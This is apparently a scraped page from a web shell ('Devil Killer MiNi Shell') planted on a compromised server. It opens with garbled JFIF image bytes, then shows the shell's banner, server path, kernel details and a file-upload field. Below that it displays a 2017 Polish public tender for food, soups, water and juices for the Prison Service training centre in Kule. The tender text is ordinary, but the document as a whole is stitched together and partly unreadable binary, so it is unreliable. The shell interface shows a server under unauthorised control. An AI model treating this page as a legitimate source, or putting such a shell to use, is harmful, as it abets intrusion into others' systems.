JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170124/13245-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.sw.gov.pl' target='_blank'>http://www.sw.gov.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 13245 - 2017
              z dnia 2017-01-24 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Popów: Dostawy ogólnych artykułów  spożywczych w  tym  zup, sosów oraz  wody i soków dla OSSW w Kulach.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Ośrodek Szkolenia Służby Więziennej w Kulach, krajowy numer identyfikacyjny
              00067518100000, ul.
              Kule 
              2,
              42110  
              Popów, woj.
              śląskie, państwo
              Polska, tel.
              034 3104030, e-mail
              dil_kule@sw.gov.pl, faks
              034 3103653.
              <br />
              Adres strony internetowej (URL): www.sw.gov.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Ośrodek Szkolenia Służby Więziennej </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.sw.gov.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Dostarczenie do siedziby Zamawiającego<br />
                Adres:
                <br />Ośrodek Szkolenia Służby Więziennej w Kulach, Kule 2 , 42-110 Popów</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawy ogólnych artykułów  spożywczych w  tym  zup, sosów oraz  wody i soków dla OSSW w Kulach.<br /><b>Numer referencyjny: </b>OSK-DKW.2232.2.2017.MS       <br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia, na potrzeby Ośrodka Szkolenia Służby Więziennej w Kulach, są  dostawy ogólnych artykułów  spożywczych w  tym  zup, sosów oraz  wody i soków
zadanie  nr 1   Przedmiotem zamówienia są  dostawy artykułów  spożywczych  dla OSSW w Kulach

 L.P	Nazwa artykułu	j. m	Ilość
1	Groch połówki	kg	100
2	Orzechy włoskie łusk.	kg	10
3	Fasola biała Jaś	kg	100
4	Rodzynki	kg	15
5	Ogórek kiszony	kg	300
6	Kapusta kiszona	kg	500
7	Minikolby kukurydzy	kg	10
8	Przecier ogórkowy	kg	30
9	Szczaw konserwowy	kg	30
10	Koncentrat buraczany	l	15
11	Seler konserwowy łagodny	kg	70
12	Pieczarki marynowane	kg	10
13	Pieczarki krojone	kg	30
14	Papryka konserwowa	kg	200
15	Chrzan tarty	kg	30
16	Pomidory krojone	kg	20
17	Koncentrat pomidorowy	kg	200
18	Groszek konserwowy	kg	100
19	Fasola konserwowa czerwona	kg	30
20	Kukurydza konserwowa	kg	120
21	Ogórek konserwowy	kg	300
22	Żurawina do mięsa	kg	7
23	Dżem niskosłodzony	kg	40
24	Dżem wysokosłodzony	kg	150
25	Ananas w syropie	kg	40
26	Brzoskwinie w syropie	kg	40
27	Śliwki suszone kalifornijskie	kg	20
28	Olej roślinny popularny	l	400
29	Oliwa z oliwek	l	5
30	Mąka pszenna	kg	350
31	Kasza jęczmienna	kg	150
32	Kasza manna	kg	50
33	Kasza gryczana	kg	50
34	Płatki  musli	kg	5
35	Płatki czekoladowe	kg	25
36	Płatki kukurydziane	kg	25
37	Płatki z miodem	kg	25
38	Ryż biały	kg	250
39	Mąka ziemniaczana	kg	80
40	Kwasek cytrynowy	kg	3
41	Bułka tarta	kg	200
42	Groszek ptysiowy  	kg	15
43	Paluszki solone	szt	40
44	Grzanki	kg	15
45	Cukier	kg	1000
46	Miód	kg	150
47	Napój kakaowy	kg	10
48	Czekolada mleczna	szt	1500
49	Czekolada do fontann	kg	2
50	Krem o smaku czekoladowym	kg	100
51	Wafelek w czekoladzie	szt	2500
52	Makaron gruby	kg	200
53	Makaron nitki	kg	40
54	Zacierki	kg	20
55	Makaron ryżowy	kg	30
56	Makaron lasagne	kg	40
57	Kawa rozpuszczalna	kg	15
58	Kawa naturalna	kg	5
59	Herbata expresowa	kg	65
60	Liść laurowy	kg	1
61	Majeranek	kg	3
62	Papryka mielona słodka	kg	3
63	Ziele angielskie	kg	2
64	Tymianek	kg	1
65	Ocet spirytus. 10%	l	50
66	Ocet winny 	l	3
67	Ketchup	kg	200
68	Musztarda delikatesowa stołowa	kg	130
69	Przyprawa do potraw typu "Wegeta"	kg	40
70	Delikata do ryb	kg	3
71	Delikata do mięs	kg	7
72	Przyprawa do mięsa	kg	10
73	Przypr. do ryb	kg	3
74	Przyprawa do zup w płynie uniwersalna	kg	70
75	Przyprawa do potraw poddawanych obróbce term. Typu "Jarzynka"	kg	40
76	Przyprawa do kurczaka	kg	10
77	Przyprawa gyros	kg	1
78	Przyprawa curry	kg	1
79	Czosnek granulowany	kg	2
80	Przyprawa do potraw  typu "Kucharek"	kg	40
81	Majonez dekoracyjny	l	250
82	Gałka muszkatołowa	kg	1
83	Cynamon	kg	1
84	Pieprz czarny	kg	12
85	Zioła prowansalskie	kg	1
86	Sól jodowana	kg	140
87	Sól czosnkowa	kg	3
88	Żelatyna spożywcza	kg	8
89	Żurek w płynie	l	150
90	Pasztet drobiowy	kg	150
91	Konserwa mięsna typu "Turystyczna"	kg	150

Szczegółowe informacje dotyczące przedmiotu zamówienia zawiera załącznik nr 7 do SIWZ

zadanie nr 2:Przedmiotem zamówienia są  dostawy  zup i sosów dla OSSW  w Kulach  
L.P	Nazwa artykułu	j. m	Ilość
1	Sos myśliwski	kg	10
2	Sos pieczarkowo-borowikowy	kg	10
3	Sos sałatkowy ogrodowy	kg	10
4	Sos z zielonym pieprzem	kg	10
5	Sos grzybowy	kg	10
6	Sos do spagetti	kg	10
7	Sos węgierski	kg	10
8	Zupa borowikowa	kg	10
9	Zupa szparagowa	kg	10
10	Zupa pieczarkowa	kg	10
11	Żurek w proszku	kg	25
12	Rosół z kury	kg	20
13	Zupa brokułowa	kg	10
14	Zupa porowa	kg	10
15	Sos tomato pronto	kg	10
Szczegółowe informacje dotyczące przedmiotu zamówienia zawiera załącznik nr 7 a do SIWZ.

zadanie  nr 3 Przedmiotem zamówienia są  dostawy wody i soków dla OSSW w Kulach 
  

L.P	Nazwa artykułu	j. m	Ilość
1	Sok owocowy 0,200l	l	700
2	Sok pomarańczowy 1l	l	2000
3	Sok grapefruitowy 1l 	l	300
4	Woda mineralna 0,5l	l	4000
5	Woda mineralna 1,5l	l	7500


Szczegółowe informacje dotyczące przedmiotu zamówienia zawiera załącznik nr 7 b do SIWZ.<br /><br /><b>II.5) Główny kod CPV: </b>03000000-1<br /><b> Dodatkowe kody CPV:</b>15800000-6,
                15330000-0,
                15600000-4,
                15871200-6,
                15891400-4,
                15321000-4,
                15981000-8<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 28/02/2018<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia warunków w tym zakresie<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie stawia warunków w tym zakresie<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Za spełniających ten warunek Zamawiający uzna wykonawców, którzy wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonują dostawy w zakresie niezbędnym do wykazania spełniania warunku doświadczenia, przez co zamawiający rozumie realizację w okresie trzech ostatnich lat minimum trzech dostaw odpowiadających swoim rodzajem dostawie stanowiącej przedmiot zamówienia. Jeżeli okres prowadzenia działalności jest krótszy spełnienie niniejszego warunku powinno nastąpić w tym okresie. Wykonawcy muszą podać Zamawiającemu dane dotyczące zrealizowanych w tym okresie dostaw odpowiadających swoim zakresem przedmiotowi zamówienia ze wskazaniem wartość, przedmiotu, dat wykonania i podmiotów na rzecz których dostawy zostały wykonane  oraz załączeniem dowodów określających czy te dostawy zostały wykonane lub są wykonywane należycie<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy </div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Wykaz wykonanych dostaw odpowiadających swoim rodzajem dostawie stanowiącej przedmiot zamówienia według wzoru stanowiącego załącznik ner 4 do SIWZ. <br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy PZP, przekaże zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy PZP. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.
2. Wypełniony i podpisany formularz ofertowy - załącznik nr 1 d SIWZ.
3. Wypełniony i podpisany formularz cenowy w zakresie zadań od 1 do 3 - załącznik nr od 2 do 2b.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>Najkrótszy czas wymiay wadliwego towaru</td><td>20</td></tr><tr><td>Zawartość GMO w artykułach spożywczych</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
